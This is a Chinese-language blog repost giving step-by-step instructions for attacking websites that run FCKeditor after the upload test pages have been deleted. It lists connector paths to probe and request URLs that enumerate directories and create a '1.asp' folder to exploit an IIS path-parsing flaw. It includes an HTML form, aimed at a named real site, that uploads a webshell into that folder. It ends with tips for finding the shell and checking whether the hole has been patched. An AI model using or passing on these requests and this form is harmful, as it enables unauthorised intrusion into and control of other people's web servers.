解决Fckeditor删除所有上传页面如何上传
?首先,你得確定下Fckeditor的版本。
/FCKeditor/editor/dialog/fck_about.html
其次,你確定下以下幾個上傳頁面是否真的被刪除了呢?
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
嗯,好吧,都已經刪除了,真是太倒霉了,怎么辦,確認下這些文件有哪個存在的么
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php
如果存在,那太好了,你可以繼續看下去了,我這里以aspx的為例
1.查看Media目錄下的文件:
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
紅色Media可以更改為File或者p_w_picpath,相應的進入文件或者圖片目錄下
2.利用iis解析漏洞創建1.asp特殊目錄
fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp
紅色的是對應的Media目錄,藍色的是特殊目錄名字
3.構建表單,上傳webshell到特殊目錄
<form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
將以上代表保存為HTML格式,http://www.xxx.com修改成你***的網站地址,Type=Media是對應的Media目錄,1.asp為特殊目錄名。
最后的一些提示
上 傳之后的路徑需要你在上傳表單里面的代碼里找,當然,他的呈現方式是一個上傳好了的文件名,全路徑必須你自己組合,我相信你是會的。如果訪問之后發現無法 訪問,試著上傳一張正確的圖片,再進行訪問,如果訪問成功,說明管理員已經補上了IIS路徑解析漏洞,那你得另找出路了。
轉載于:https://blog.51cto.com/pnig0s1992/767475
總結
以上是生活随笔為你收集整理的解决Fckeditor删除所有上传页面如何上传的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 使用 Apache OpenJPA 开发
- 下一篇: x264编码参数大测试:10 trell